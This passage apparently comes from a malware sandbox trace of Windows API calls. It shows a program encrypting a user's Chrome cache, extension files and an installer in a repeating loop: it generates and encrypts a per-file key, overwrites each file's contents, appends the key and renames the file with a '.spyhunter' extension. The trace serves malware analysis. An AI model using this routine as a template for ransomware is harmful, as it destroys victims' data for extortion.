HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe.spyhunter")) returned 1 [0132.078] GetProcessHeap () returned 0x2c0000 [0132.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0132.078] GetProcessHeap () returned 0x2c0000 [0132.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0132.078] GetProcessHeap () returned 0x2c0000 [0132.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31e4f8 | out: hHeap=0x2c0000) returned 1 [0132.078] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f678 | out: pbBuffer=0x57f678) returned 1 [0132.078] GetProcessHeap () returned 0x2c0000 [0132.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0132.079] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f670*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f670*=0x30) returned 1 [0132.079] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0132.088] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3") returned 92 [0132.088] StrStrW (lpFirst="data_3", lpSrch=".txt") returned 0x0 [0132.088] GetProcessHeap () returned 0x2c0000 [0132.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0132.088] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f634, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f634*=0x2800, lpOverlapped=0x0) returned 1 [0132.947] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.947] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f634, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f634*=0x2800, lpOverlapped=0x0) returned 1 [0132.947] GetProcessHeap () returned 0x2c0000 [0132.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0132.947] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.947] WriteFile (in: hFile=0x17c, lpBuffer=0x57f674*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f634, lpOverlapped=0x0 | out: lpBuffer=0x57f674*, lpNumberOfBytesWritten=0x57f634*=0x4, lpOverlapped=0x0) returned 1 [0133.920] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f634, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f634*=0x30, lpOverlapped=0x0) returned 1 [0133.920] CloseHandle (hObject=0x17c) returned 1 [0133.920] GetProcessHeap () returned 0x2c0000 [0133.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0133.920] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3.spyhunter") returned 102 [0133.920] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_3.spyhunter")) returned 1 [0133.921] GetProcessHeap () returned 0x2c0000 [0133.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0133.921] GetProcessHeap () returned 0x2c0000 [0133.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0133.921] GetProcessHeap () returned 0x2c0000 [0133.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b568 | out: hHeap=0x2c0000) returned 1 [0133.993] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f660 | out: pbBuffer=0x57f660) returned 1 [0133.993] GetProcessHeap () returned 0x2c0000 [0133.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0133.993] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f658*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f658*=0x30) returned 1 [0133.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0133.994] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0133.994] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0133.994] GetProcessHeap () returned 0x2c0000 [0133.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.994] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f61c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f61c*=0x2800, lpOverlapped=0x0) returned 1 [0134.095] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.095] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f61c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f61c*=0x2800, lpOverlapped=0x0) returned 1 [0134.095] GetProcessHeap () returned 0x2c0000 [0134.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0134.095] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.095] WriteFile (in: hFile=0x158, lpBuffer=0x57f65c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f61c, lpOverlapped=0x0 | out: lpBuffer=0x57f65c*, lpNumberOfBytesWritten=0x57f61c*=0x4, lpOverlapped=0x0) returned 1 [0134.095] WriteFile (in: hFile=0x158, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f61c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f61c*=0x30, lpOverlapped=0x0) returned 1 [0134.095] CloseHandle (hObject=0x158) returned 1 [0134.095] GetProcessHeap () returned 0x2c0000 [0134.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.096] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.spyhunter") returned 172 [0134.096] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.spyhunter")) returned 1 [0134.096] GetProcessHeap () returned 0x2c0000 [0134.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.096] GetProcessHeap () returned 0x2c0000 [0134.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0134.096] GetProcessHeap () returned 0x2c0000 [0134.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc9648 | out: hHeap=0x2c0000) returned 1 [0134.096] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f660 | out: pbBuffer=0x57f660) returned 1 [0134.097] GetProcessHeap () returned 0x2c0000 [0134.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0134.097] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f658*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f658*=0x30) returned 1 [0134.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0134.097] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json") returned 155 [0134.097] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.097] GetProcessHeap () returned 0x2c0000 [0134.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0134.097] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f61c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f61c*=0xe2, lpOverlapped=0x0) returned 1 [0134.098] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.098] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x57f61c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f61c*=0xe2, lpOverlapped=0x0) returned 1 [0134.098] GetProcessHeap () returned 0x2c0000 [0134.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0134.098] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.098] WriteFile (in: hFile=0x158, lpBuffer=0x57f65c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f61c, lpOverlapped=0x0 | out: lpBuffer=0x57f65c*, lpNumberOfBytesWritten=0x57f61c*=0x4, lpOverlapped=0x0) returned 1 [0134.099] WriteFile (in: hFile=0x158, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f61c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f61c*=0x30, lpOverlapped=0x0) returned 1 [0134.099] CloseHandle (hObject=0x158) returned 1 [0134.099] GetProcessHeap () returned 0x2c0000 [0134.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.099] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.spyhunter") returned 165 [0134.099] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.spyhunter")) returned 1 [0134.099] GetProcessHeap () returned 0x2c0000 [0134.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.099] GetProcessHeap () returned 0x2c0000 [0134.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0134.099] GetProcessHeap () returned 0x2c0000 [0134.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e638 | out: hHeap=0x2c0000) returned 1 [0134.101] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f658 | out: pbBuffer=0x57f658) returned 1 [0134.101] GetProcessHeap () returned 0x2c0000 [0134.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0134.101] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f650*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f650*=0x30) returned 1 [0134.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0134.101] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json") returned 155 [0134.101] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.101] GetProcessHeap () returned 0x2c0000 [0134.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0134.101] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f614, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f614*=0x104, lpOverlapped=0x0) returned 1 [0134.102] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.102] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x57f614, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f614*=0x104, lpOverlapped=0x0) returned 1 [0134.102] GetProcessHeap () returned 0x2c0000 [0134.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0134.102] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.103] WriteFile (in: hFile=0x158, lpBuffer=0x57f654*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f614, lpOverlapped=0x0 | out: lpBuffer=0x57f654*, lpNumberOfBytesWritten=0x57f614*=0x4, lpOverlapped=0x0) returned 1 [0134.104] WriteFile (in: hFile=0x158, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f614, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f614*=0x30, lpOverlapped=0x0) returned 1 [0134.104] CloseHandle (hObject=0x158) returned 1 [0134.104] GetProcessHeap () returned 0x2c0000 [0134.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.104] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.spyhunter") returned 165 [0134.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json.spyhunter")) returned 1 [0134.104] GetProcessHeap () returned 0x2c0000 [0134.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.104] GetProcessHeap () returned 0x2c0000 [0134.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0134.105] GetProcessHeap () returned 0x2c0000 [0134.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e328 | out: hHeap=0x2c0000) returned 1 [0134.106] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f650 | out: pbBuffer=0x57f650) returned 1 [0134.106] GetProcessHeap () returned 0x2c0000 [0134.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0134.106] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f648*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f648*=0x30) returned 1 [0134.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0134.106] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json") returned 155 [0134.106] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0134.106] GetProcessHeap () returned 0x2c0000 [0134.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0134.106] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f60c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f60c*=0xdf, lpOverlapped=0x0) returned 1 [0134.108] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0134.108] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xdf, lpNumberOfBytesWritten=0x57f60c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f60c*=0xdf, lpOverlapped=0x0) returned 1 [0134.108] GetProcessHeap () returned 0x2c0000 [0134.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0134.108] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.109] WriteFile (in: hFile=0x158, lpBuffer=0x57f64c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f60c, lpOverlapped=0x0 | out: lpBuffer=0x57f64c*, lpNumberOfBytesWritten=0x57f60c*=0x4, lpOverlapped=0x0) returned 1 [0134.109] WriteFile (in: hFile=0x158, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f60c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f60c*=0x30, lpOverlapped=0x0) returned 1 [0134.109] CloseHandle (hObject=0x158) returned 1 [0134.109] GetProcessHeap () returned 0x2c0000 [0134.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0134.109] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.spyhunter") returned 165 [0134.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json.spyhunter")) returned 1 [0134.111] GetProcessHeap () returned 0x2c0000 [0134.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0134.111] GetProcessHeap () returned 0x2c0000 [0134.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0134.111] GetProcessHeap () returned 0x2c0000 [0134.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e018 | out: hHeap=0x2c0000) returned 1 [0134.112] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f648 | out: pbBuffer=0x57f648) returned 1 [0134.112] GetProcessHeap () returned 0x2c0000 [0134.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0134.112] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f640*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f640*=0x30) returned 1 [0134.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 